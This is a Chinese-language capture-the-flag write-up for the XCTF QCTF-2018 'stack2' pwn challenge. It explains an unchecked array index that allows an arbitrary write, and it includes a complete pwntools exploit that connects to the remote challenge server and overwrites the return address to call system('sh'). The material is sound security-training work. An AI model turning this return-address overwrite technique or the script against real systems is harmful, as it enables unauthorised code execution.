题目来源： XCTF 4th-QCTF-2018

题目描述：暂无

 

 

程序在change number功能里面没有对下标进行检验，因此可以任意写地址，因此将返回地址更改即可

这题目有点问题，给的后门函数是system("/bin/bash")，但是调用之后会提示你找不到bash，但是也能做

方法是自己构造调用，将返回地址处更改为p32(system_plt)+p32(ret_addr)+p32("sh")即可

exp如下：

from pwn import *

#io = gdb.debug('./stack2', 'b *0x8048839')
#io = process('./stack2')
io = remote('111.200.241.244', 56178)

def change_number(pos, val):
    io.recvuntil('1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit\n')
    io.sendline('3')
    io.recvuntil('which number to change:\n')
    io.sendline(str(pos))
    io.recvuntil('new number:')
    io.sendline(str(val))

io.recvuntil('How many numbers you have:\n')
io.sendline('1')
io.recvuntil('Give me your numbers\n')
io.sendline('1')
change_number(132, 0x50)
change_number(133, 0x84)
change_number(134, 0x04)
change_number(135, 0x08)
change_number(136, 0xd0)
change_number(137, 0x85)
change_number(138, 0x04)
change_number(139, 0x08)
change_number(140, 0x87)
change_number(141, 0x89)
change_number(142, 0x04)
change_number(143, 0x08)
io.recvuntil('1. show numbers\n2. add number\n3. change number\n4. get average\n5. exit\n')
io.sendline('5')

io.interactive()